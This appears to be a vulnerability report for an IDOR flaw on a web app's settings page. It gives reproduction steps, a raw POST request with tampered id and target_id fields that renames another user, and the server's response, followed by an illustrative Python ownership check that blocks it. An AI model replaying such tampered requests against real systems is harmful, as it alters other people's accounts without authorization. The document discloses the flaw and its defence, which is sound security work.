IDOR on settings page #2

@jeremybuis

Steps to reproduce:

  1. Log in as a normal user
  2. Update your settings
  3. Capture the request using an intercepting proxy
  4. Resend the request after updating the id and target_id and name field to another user
  5. Navigate to the other user's wall and see that their name has been changed

Attack Request:

POST /settings?id=486 HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

regLastName=Test&regPassword=&regDOB=1995-09-01&regEmail=jbuis@softwaresecured.com&regUsername=otest&regFirstName=Olivia&target_id=486&regPasswordConfirm=

Attack Response:

HTTP/1.1 302 
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 14:01:09 GMT
Connection: close
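
A server-side ownership check that would reject the request above, added here as an example and not taken from the original report or the project's code. The session store, the function names and the mapping of the reporter's session to user 1002 (the id in the Referer header) are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for the server-side session store (session id -> user id).
# Assumption: the reporter's session belongs to user 1002, the id in the Referer.
SESSIONS = {"CB39DD1389BDE85C38D86EDE670B1363": 1002}

# Request target and form body as they appear in the report's attack request.
ATTACK_TARGET = "/settings?id=486"
ATTACK_BODY = ("regLastName=Test&regPassword=&regDOB=1995-09-01"
               "&regEmail=jbuis@softwaresecured.com&regUsername=otest"
               "&regFirstName=Olivia&target_id=486&regPasswordConfirm=")


class Forbidden(Exception):
    """Raised when a request names a user other than the session owner."""


def authorize_settings_update(session_id, request_target, form_body):
    """Return (owner_id, fields) for a permitted update, else raise Forbidden."""
    owner = SESSIONS.get(session_id)
    if owner is None:
        raise Forbidden("no authenticated session")
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    form = parse_qs(form_body, keep_blank_values=True)
    # Check every occurrence, so a duplicated parameter cannot smuggle a second id.
    supplied = [("id", v) for v in query.get("id", [])]
    supplied += [("target_id", v) for v in form.get("target_id", [])]
    for name, value in supplied:
        if value != str(owner):
            raise Forbidden(f"{name}={value} is not session user {owner}")
    # The row to update is chosen from the session, never from the request.
    fields = {k: v[-1] for k, v in form.items() if k != "target_id"}
    return owner, fields


def is_permitted(session_id, request_target, form_body):
    """Boolean wrapper for logging or tests."""
    try:
        authorize_settings_update(session_id, request_target, form_body)
        return True
    except Forbidden:
        return False
```

With this check in place the reported request would be answered with a 403 instead of the 302 shown above, because both id and target_id name user 486 while the session belongs to another user.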
